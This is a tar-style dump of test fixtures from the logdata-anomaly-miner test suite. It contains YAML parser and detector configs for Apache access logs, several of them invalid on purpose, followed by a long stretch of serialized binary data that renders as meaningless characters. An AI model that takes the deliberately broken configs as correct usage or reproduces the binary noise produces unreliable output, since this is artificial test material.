from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name=None) anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/000077500000000000000000000000001437606560100251655ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub1.yml000066400000000000000000000005761437606560100265320ustar00rootroot00000000000000Parser: - id: 'fix1' type: FixedDataModelElement name: 'fix1' args: 'fixed1string' - id: 'decimal1' type: DecimalIntegerValueModelElement name: 'decimal1' - id: 'seq1' type: SequenceModelElement start: True name: 'seq1' args: - fix1 - decimal1 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub2.yml000066400000000000000000000011321437606560100265200ustar00rootroot00000000000000Parser: - id: 'decimal2' type: DecimalIntegerValueModelElement name: 'decimal2' - id: 'fix2' type: FixedDataModelElement name: 'fix2' args: 'fixed2string' - id: 'decimalFloat2' type: DecimalFloatValueModelElement name: 'decimalFloat2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'seq2' type: SequenceModelElement start: True name: 'seq2' args: - decimal2 - fix2 - decimalFloat2 - sub3 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub3.yml000066400000000000000000000011541437606560100265250ustar00rootroot00000000000000Parser: - id: 'fix3' type: FixedDataModelElement name: 'fix3' args: 'fixed3string' - id: 'decimalFloat3' type: DecimalFloatValueModelElement name: 'decimalFloat3' - id: 'seq3' type: SequenceModelElement name: 'seq3' args: - fix3 - decimalFloat3 - id: 'any3' type: AnyByteDataModelElement name: 'any3' - id: 'first3' 
type: FirstMatchModelElement start: True name: 'first3' args: - seq3 - any3 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_error.yml000066400000000000000000000010771437606560100332660ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector min_num_vals: 100 max_num_vals: 99 learn_mode: False logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_valid.yml000066400000000000000000000013301437606560100332240ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector1 min_num_vals: 100 max_num_vals: 200 learn_mode: False - type: EventTypeDetector id: EventTypeDetector2 min_num_vals: 100 max_num_vals: 100 learn_mode: False logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/double_parserstart_config.yml000066400000000000000000000026001437606560100331370ustar00rootroot00000000000000AminerUser: 'aminer' AminerGroup: 'aminer' LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' start: True type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: 
["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/filter_config_errors.yml000066400000000000000000000027241437606560100321230ustar00rootroot00000000000000AminerUser: 'aminer' AMinerGroup: 'aminer' # this attribute does not exist LogResourceList: - 'file:///var/log/apache2/access.log' RemoteControlSocket: '/var/run/aminer-remote.socket' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' args2: 'apache2' # this attribute does not exist - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False timestamp_paths: "/model/accesslog/time" Analysis: - type: ParserCount id: ParserCount paths: ["/model/accesslog/status"] report_interval: 10 reset_after_report_flag: False # this attribute does not exist learn_mode: True # this attribute does not exist - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector1 paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' output_logline: False allow_missing_values: False EventHandlers: - id: stpe type: StreamPrinterEventHandler output_file_path: '/tmp/streamPrinter.txt' - id: syslog type: SyslogWriterEventHandler output_file_path: '/tmp/streamPrinter.txt' # this attribute does not exist 
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/invalid_config.yml000066400000000000000000000034061437606560100306660ustar00rootroot00000000000000"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." 
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/invalid_schema.yml000066400000000000000000000026711437606560100306640ustar00rootroot00000000000000# This schema is invalid, because of the Some_Weird_Option key. Some_Weird_Option: "test" AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/json_config.yml000066400000000000000000000011771437606560100302140ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" EventHandlers: - id: stpe json: True # optional default: False type: 
StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/learnMode_config.yml000066400000000000000000000016741437606560100311530ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/main.yml000066400000000000000000000012451437606560100266360ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'sub1' type: Sub1 name: 'sub1' - id: 'sub2' type: Sub2 name: 'sub2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'apacheModel' type: ApacheAccessModel name: 'apache' - id: 'START' start: True type: FirstMatchModelElement name: 'model' args: - sub1 - sub2 - sub3 - apacheModel Input: timestamp_paths: [""] EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/missing_parserstart_config.yml000066400000000000000000000026121437606560100333410ustar00rootroot00000000000000AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' type: 
SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/multiSource_config.yml000066400000000000000000000017511437606560100315540ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: multi_source: True # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/multiple_components.yml000066400000000000000000000173201437606560100320130ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: 
'/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=G?LGP+tG?+%G?FWfG?!zm>G?Y0G?.ɨG?e$"G?fٶ#G?n\G?L]G?b~G?jV=G?OmEG?:0 G?煃؃G?F8G?v3$G?^5ȃG?< G?(G?G?}}dG?+NT:G?̿FiG? j*G?-O(G?T-G?k.AG?sp G?X(G?)8n8lG?G?"۝,G?V幒G?}*,Ƹ-G?{: G?&$G?TG?K$$d%G?SquG?U0 G?mP#"G?؁>/G?}?uG?ӜSG?eu2G?6t[G?fAG?ĜHG?G?(~zeG?ap'G?ӕpG?^4G?SG?:2x*G?ӮL G?쎐"G?]kG?7RG? G?xG? "`}G?럖?OG?LDMG?(WG?MfG?>-HVG?G?ٶR.<=G?>|MG?ﲜ'G?/MԻG?XRkG?!١rG?azvG?_q G?IxG?@rCG?[ogG??.PG?esdXG?G?ʇՏCUG?š,yG?^!9G?w#r G?"2G?҂s'IG?"qG?r?G?XAG?vEG?D dG?cVVG?#qG?4VG?~cG?cATG?P)+G?k"UG?m~U<0G?UBG?jGM G?zD7G?E( BG?G(LG?_٧G?@ZG?ÊD@nG?}UH'G?K 4ӏG?a}~|G?Ҭp%^G?cj<LJG?FG?س+]fG?YQPG?:G? 3G?= 6@G?LG?Lo`aG?VהG?(KG?_:x晴G?ָ*_ G?^ɮzCG?*sG?B~G? LAG?~>yG?ÍyyG?vHSS^G?vt1G?R3G?AkW~G?%G?˾+' %?G?4G?)WzG?[sdG?oxQ"G?Y,G?7xW G?!B3]G?9rbvG?9,G?ʧG?޻ZFG?,Q*G?noG?^ 9w$G?TVG?^^G?t/M0MdG?KQꟊG?Ϻ;0 G?y5FG?Ɣ1"!G?G?ksG?ꆺG?Q5!G?ׇY CG?pUG?29{'>G?2i G? 
.c[RG?x0G%G?ڈ&ICG?#G?=fsjG?\z)G?ê.G?]￵vG?./xG?_G?pHG?G?f|G?G?cwG?ꎟr)BG?MdG?{LUrG?ѧ G?C"G?"4nG?VdG?Ú YG?S;P(G?⤬G?WVQG?1%IG?4j{G?a+/G?[=G?QGG?+ 6G?J%G?U.M7G?y'KG?˼n TG?ܓG?.G?Ñ~NG?; VG?᮵߹G?o4G>`qG?'՝wG?*EG?emItG?SG?-YG?JG?=5eG?nY-IG?LMG?Mb@ȍG?tG?msG?2G?ٽYNG?mFO9G?@ ޱG?ЭG?5G?5p\G?̔G?L2G?d0N\G?s ӳG?#ʑG?rsG?ɛ뾊?G?z)G?dQG?ȄgG?=H 5G?ESЄG?CsG?fdaG?׊MʥG?ڱ“G?S;G?׸FG?J~*. G?]ċ"G?ųB}TG?ͪ+XG?EhwG?哇+Y#G?X.kGG?{1G?놊HWG?-ۃG?+-aWG?2NgG?R~e G?>RzG?{G?ØlKqG?EG?PөsG?ИG?젱XˠG?йqkG?:pArG?%yG? &G?ٷ%Lm G?dX JzG?y:SG?qi)G?V`02G?0lG?N-JG?„}&G?q&G?ځ9θG?H2 G??]G?<6 23G?1ݬ:G??>lG?眻wG?z>ˠ(G?μG?ӊG? pY zG?bԂG?T6cenG?zJG?0nwG?gdCG?1ʟ"G?W[]ǠG?FG?Եr8).G?24G?cjG?\rLM!G?`lXG?KƜG?c!BG?{EG?-<%ZG?YuiG?G?Qǣ|G?}RG[G?EoTsG?KH"G?`G?AX:G?x}>G?G?ǻyQG?DAhG?P]BCG?6G?G?0G?qbsyG?%G?ڮG?L_(SG?N>G?ӘG?rg1dG?䐅G?JG?u$k(G?.G?= -qG?pj{^G?ոxG?DTG?2fTG? zOG?Mش@G?獧W'G?ﺟH0dG?~.wxG?ߧ](G? G?˶G?bG?LEG?_RsG?йdՉ+G?J:v7G?ÐG?` ҃G?U?G?G?fgnG?G?I4[G?n0G?9p?G?&KG?ASG?VL0_LG?E=G?yn G? hG?K G?ҶFEG?N6G?㑀ۅG?NG2G?M#{G?bȻ$G?ѓԮ G?'Q?G?:jdG?fH#CUG?TҥRG?!@vG?#wG?SSdG?f G?JG?`܄G?Op2ZQG?EbK G?G?V=G?0C{G?uON-G?ӈY9G?P?#G? O_asG?bG?9pG?!rjrG?`2G?; (G?8>A]G?eفG?ƫص|G?VcxG?MG?U3=G?ݜ[G?jG?`,G?RnG? [G?K/G?z A\G?QG?)}G?`:G?ͶeLG?!G?xXD\G?S^tG?;G3`G?d%;ZG?SMG?NrG?v4@G? G?p&G?1_G?+[uG?b,G?tZOG?FG?lʗG?"cjG?g8暥G?=d3G?p֌G?EUG?䇂G?ݬG?精T>c*G?h@9G?#ɑG?ہwG?~,Qt5G?-yAG?,e8|uG?=fNG?:G?*G?-&G?huq@G?rG?fG?6O7G?ptG?tlsG?`@Ye~G?:`G?z)LG?SG?_=G?fV G?X~9 G?fTK?G?D/pG?#$G?v} G?'j:(G?U\NG?jCyG?-5G?N.nG?5G?^m%нG>m*FG?l(pG?%G?c'G?DTbG?XG?-rcG?B2xTG?9NG?d7:G?TCG?M nG?0BlG? G?7'Oe(G?%@́G?}\" G?+eG?4w7]qG?G?.mG?QݡG?cG?,0G?ԝRG?邩WꅑG?zYmG?U?B;rG?&K7G?VY.*G?[?}G?#ayG?ΆЧU:G?$nG?fx/G?="G??w!G?0rw.=G?'G?G?1dG?Ǘ^VG?\!G.G?b=&G?*EG?B"TG?.8%G?xsG? m G?+*oG?}~QG?":+G?Te/G?*>3u_G?cl4G?'G?u G?$ G? x?G? 3G?&K>G?C 湫G?Z_G?㟭Ĉ)G?eÚGG?˚QG? G?!#ЁG?WIG?XɽإG?ǁ}G?ﵭG?/G?侕K G?lqG?xBG?G?{ G?i)<G?ږo9G?{ G? 
lG?ݩ8xI4G?NcVۭG?݅3AhG?LlG?tG?Q𐆚 G?.wl0G?|%.G?&A+G?_: G?F]0G?[!G?;~^9G?kOG?'7j0G?F;ZG?ޓ鞋G?ֻ*W G?)M RG?喜l)G?׆ 7ZG?ymG?YG??ՃG?G//jG?ÊWg+G?߹&G?>~CG?-IIG?{paG?ZGH(G?G?꺜(G?nG?'oG?\{&G?ᄼGeG?ѱJ(9cG?KBsG>؉1G?r!G?<G?M/gG>⳥r\G?\rG?M|G?iT8G?uz]G?咜cG?TW*OG?96G?!+G?6xEG?-VG?X]`G?[S&G? ,G?a:G?െ"G?]OG?8ԟG?mnG?V y 4G?ᄾLׯ-G? G?ؤە{G?r; G?Rk;j7G?A 0G?#9AG??FFG?ʔ!B7 @G? cNVG?H._G?k* XEG?7-iG?h3EiRG?]XG? GG?[G?W?G?T G?1ԅPG?҄G?L냌G?}ۥ,G? >G?\CG?~öG?}XG?阘OG?:G?om 8G?:MOG?"EVG?'G?;XG?$@XG?$UG?j]G?x0µG?9WlG?iN$G?2(G?.|G?|~3G?ˈYqKG?rt٪G?ӽpQyG?›'7G?;G?G?(G??G?ޘ*G?˘O~!&G?ԝVG?.ka6G?5{@G?fxG?͔ouG?݉v)G?ҹ'!G?lSFN G?'5G?RDG?G?qDnJG?}G?ݓoG?r'ퟺG?ةԱG?VmF@G?Dyv-RAG? G?bIJG?EG?3G?{B/ӔG?ܦQ^G?M*ږ\G?V8G?:ɕ\ G?h`a4G?2DQ,G?IUaNYG?}TG?4AYG?|_nG?` G?0CvG?TG?ڑ~G?G? ꅮXUG?ӕ@tB$G?Z BG?|mKvG?tJ G?W;G?Reґ:G?Kף)%G?Sb\tG?Q6ޞ8G?a@/G?eG?!+G?^6)G?Qu$iG?Tx G?T5\G? y)G?~/G?mL`dG?vG?[ 舦8G?SBMXG?db|G?L VIG?cߟG?=_G?1SG?penG?ٗ wG?v1G?G?AG?t |ӓG?kSG?.j\JG?@*G?iฤ"G?hv4G?pG?.EBG?0`B}G?D~(G?vG? ŧ@G?wȽG?RTgG?cDQG?YV G?X)G?wn^4=G?±naeG?S zG?㎏CQG?ٸG?)~،G?{[G?G??ۙG?Sd7G?֌[G?桖zcG?р*ڢDG?fG?,ᕀG?klG?>GC}G?NBDG?AC 8G?‹92G?M G?~~mbKG? gG?G?VgL~G?U RG?G?G?D^4ٷ4G?ذڄG?~S2¡G?u]G?­G?`':G?kΆ{G?Ei.G?˦WnN"G?dG?̷)z3G?.N*fG?U5ܾG?]KG?/No/G?:lG?lAȫG?CVG?a]G?\!G?+6oG?\~޾SG?OXG?|1gG?av G?]G?›G? dG?G?Nx3!G?UKIG?UO G?ӂhV:G?6 {G?YLTG?sG?إ_!G?( ڼG?@O2G?aLG?y,bG?7G?hG?qQC5G?5G?]_-*G?_5G?NLlrG?B&G?ϙGG?WշwG?1~G?#3]G?&7Vc~G?pcҲG?-6VifG?͢G?}jp6G?̚>'G?bjzG?뒳G?Gj^G?߀G?уG?⫻)G?斄['G?.G?\m 0G?pñiG?pydG?ҪG?O{G?ȱBIG?*G?˅ѐG?vzG?ꠏXG?_G?c;)"YG? łvG?o+[b(G? ?G?p:9G?%U֨G?ܯ>G? UG?G G+1G?0fG?+LkG?Y@HqG? ^jG?쾠 LG?`@G?AG?Tn G?)(G?Ʋ5M`G? ^T G? MEG?oW/:G?eSG?2tKΓG?ҨhG?+pw1G?2s iG? G?ɟZEG?txJ\`G?8,@G?1G?$vG?t}"G?ъXE+G?=Ǥ G?q3vG?$J:G?޶kG?UG?古eG? 1OS@G?G?~2 oG?h+G?yG?]G?G?ŜMG?b3G?Miӧ0YG?GU\G?ݶLVG?a|YG?yHG?Ј( $G?U G?orjG?b>6UG?fFZG?o\ԓG?^ kG?k"G?=L"߻G?=MG?Ϙ<]G?a7G?EoG?k5G?: G?_B:`G?(A G?x>^}G?}G?nnG?CG?~G?ҧJjsG?]6G?=GG?{t2rG?B7 WG?M/ZbuG?\tG?G? 
G?3QׯȮG?cFG?ȡzG?-,YG?T)nG?CdRrG?UG?N+G?|2.^ G??G?LhG?ԐӦ G?.xG?+uiG?k7G?ˬ?nDG?#G?[_)>G?i&G?>Dd:G?(W&G?{O X۹G?ﹰ!?{G?0(\G?n,[icG?y )=G?М@l|G?f#:z+G?3%{aG?HIZ.G?}8 G?v*nG?lyfaG? e@G?a"G?z(NG?,O)G?ڂ9<G?8kVG?:j⃕G?SfpYG?֤F1G?.UUG?O7~G?x? G?/=NQG?B_G?4}mG?PWG?쭴/G?"ti^G?CwG?aK~G?aG?(H"zEG? ޶G?(ZG?NJG?CQG?і\.G?)-ZG?'ZnPG? J?G?!٦G?136fG?T4?G?_9G?hM3G?~,XG?^ݹG?>0G?XӟR#G?[G?Ri8G?0IG?ԃG?)G?R2G?¤_%G?؊pbG?p?DmG?, xG?&'sG?:!G?G?G?yG?ԽnGG?W G?0p-G?,D0G?}G?*RGG?C%jnNG?ߞ{nuG?S̉iUnG?q7G?bHG?ď&G?MG?M3G?GG?p{bzG?"6G?(tG?fG?ںw Y$hG?I9G?Z5G?G?h#evG?Ug*UG?薈1s=G?EMG?m}G?ǣYfG?G?ρH~zQG?쓔v9G?G?uɝRG? 2)G?#rੈwG? ؾ=G?' cZG?PG?́:QNG?}\G?q7fG?r`+G?G?I%G?,81G?Rx}~(G?<G?h_`G?")JG?aBG?%&eEG?նZ6G?c+4}G?Ib7G?󺰇G?1 bG?2G?$z-*G?SE G?Q˭G?3yG?][FG?*5LG?Ӱ6i5VG?ysG?DG?؁w,qG?ݻԝ|NG?F:G? ȕG?yJn_G?WG?꿣T|G?qc?G?;iq/G?G?ͤ,bG?b _G?sꇨG?ꡍqG?ARG?&wG?nQ`G?ȤHG?Խ&EG?G? 6zSG?ݛ}7?Rhh Cj?Rhh C?Rhh Co;?Rhh C(9J?Rhh C[Zn?Rhh Cr*=2A_`?Rhh C\4?Rhh Cמ*?Rhh C t?Rhh C(?Rhh C;Jz+ ?Rhh CW4~?Rhh Cb1?Rhh CP9?Rhh C/ K?Rhh CDDd?Rhh CXx?Rhh C&A>Z0o?Rhh C;%?Rhh C _?Rhh C :}?Rhh CS{?Rhh CBn?Rhh C.?Rhh CfR?Rhh CJ?Rhh C^d?Rhh Ci[?Rhh C4'8?Rhh Cmj1?Rhh Cd0XQg?Rhh C ܍8?Rhh Cc?Rhh Cma?Rhh C2!}?Rhh CcS?Rhh C ~N?Rhh Cn%p?Rhh C5,a?Rhh Cl >e?Rhh C0_~?Rhh C?$uE0?Rhh C!?Rhh CEFV?Rhh Cq_=H?Rhh CY:~e?Rhh C&F{1?Rhh C3?Rhh Cߏ1RI?Rhh C&DB?Rhh C+n{?Rhh C|2?Rhh Cm%?Rhh C>վ1?Rhh Ce.?Rhh CHf?Rhh Cc㌙?Rhh Cxɖ?Rhh C4b?Rhh CDn j+?Rhh CQTU?Rhh C~s#?Rhh CAcj+?Rhh CZ􁯄?Rhh C++0?Rhh C(aX?Rhh CvŮV8?Rhh C ,5?Rhh Cш?Re.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta1_data_test7000066400000000000000000000647021437606560100275320ustar00rootroot00000000000000i](](G?ӘXKG?|G?wG?jW G?z|yG>G?yG?8hn\G?^ְ̉KG? 깸G?M G?vGDG?\vQG?_eHyG?ɥ,G?@G?N-pG?wgCG?k:G?.aG?t tG?+)NG?ڙhG?ݍa5G?t0OG?>/kUG?Æ3G?s_G?AcG?Җ rG?ոb1G?T]/hjG?Ɉ+G?ۄ0K r!G?̦7sEG?N'NG?VvmG?A[wnDG?QF6|G?eoG?ulf%G?G?*jOG?\NZ9G?NG?rxG?f?GG?0F}DG?bG?ZOG?]tDsG? 
)dG?>BG?4vG?ߣ-G?~݅G?oD]+%G?3GaqG?BˮxG?jRG?oG?1>j`G?C=LG?!G?hJ -G?|G?} ӥG?G?RG?*G]SG?Ң$G?3G?{Yr>&G?!OG?wKԢG?@aG?}sG?ŇZG?ݿ0G?8x G?(x+G?G?7mG?؏G?v~G?O;΂G?;H-G?U7U=G?_[&G?'GG?c@IG?`5GG?^CGOG? HOWG?rjG?T\G?d1dG?g1zFG?I"(H8G? &G?!}-G?ٙZ1\G?q G?PZG?wGCG?+>lG?M>G?eIBG?Jsc-G?!G?nuG?j?H:WG?w'=G?/G?4m;G?aCލsG?ՐxG?\) W G?1\:1rG?*$IG?2zTaG?hn"G>6DuKrG?ދÉG?.>TG?D)7zG?oG?/w`G?nG?a]WG?d72G?ܳѿkG?1n)G?;(rG?[.Ŋ1G?(`XG?אG?(^G?NF#PG?>ISG? d_G?RgLG?P`yG?9"G?K']FG?G?G?~MG?эG?#t0G?èbG?<+/G?=f0G?G?4ks7 wG?̅ G?3WG?wɀG?%Q{G?\&G?O9:nG?9;D'm)G?ƻκZ=4G?ޅhSG?hG?!/bG?Z{vG?lG?GBnLMG?+WJG?}uTG?oCC.G?S_/G?&UPhG?mCKG?9/'G?\xRG?`G?۫G?΁ԏG?1lG?R(0LG?G?%G?r\\1G?vە+G?_)+cG?k)%dG?4ڌIG? ?G?6)~G?2CG?fp,G?&WG?u-تG?& #g:G?h]k_G?r+6oG?S$zG?8B3.G?*G?JkG?H^}75G?tVJ y3|G?-0^!G?ҕAG?(BG?*o^G?ǵDG?vTLG?$G?'G?33G?-dG?#ING?{xG??$kwG?_[A$G?+YJG?_ G?~G?̕{U&G?&D8G? 5~)kG?Vc+G?ՅrG? G?ܦ=G?͒Ɨ8G?κ-G?̖ G?nPAG?xa.)G?5)6G?3HG?t^kG?qJkG?BtgG?Ƙ G?w>]G?/#"G?w-5 G?#gOG?e=YdG?ň*j|G?̣G?O#jG?H=G?yG?/G?hG?HUjG?0;G?5G?6i>G?pFG?5f G? .qG?iG?fmG?YG?7EG?.cG?1]-uG?CWPG?J3jG?DOG?J-xG?eٝG?46G? ;~wG?@JG?G)!6G?uP踋G?x=:bG?b#G?`NRG?rG?XhsLG?E5G?ų0G?țG?ɒrG?@{"!G?ӑ;G?"G?wG??U?&=G?wG? )OG?0@G?Һ9L :G?nyG?-`BG?=#T*G?dG?n1mG?ڶ'G?-Q`G?7HuG?"G?񳌉;G?iG?#qG?ɞvG?읳{^G?n`UG?K G?1FG?yG?+5G?HOmG?WRٛ:G?FeG?\QG?e: G?V EG?.[y$G?ESG?M=:G?-j G?ߥj`G? (4G?͢89q'G?bG?Ʒ5pG? O0G?G?nzG?eG?=-G?l1G?ֳ"leG? =\QG?ϙtG?UWDG?; jG?єH>,G?o̵G?c IaG?}vG>QoٹG??ݱG?ul_G?#gG?ta՛G?sfG?JZG?fatԞG?uCsl֤G?Ѣ5 G?JJG?kġk%qG? @G?D}q:G?B/G?ֹG?JJG?F;UfG?ק8G?]G XwG?ˎKG?q G?mG?\wL8G?' mI-G?EG?uNG?;NӸG?YG?T 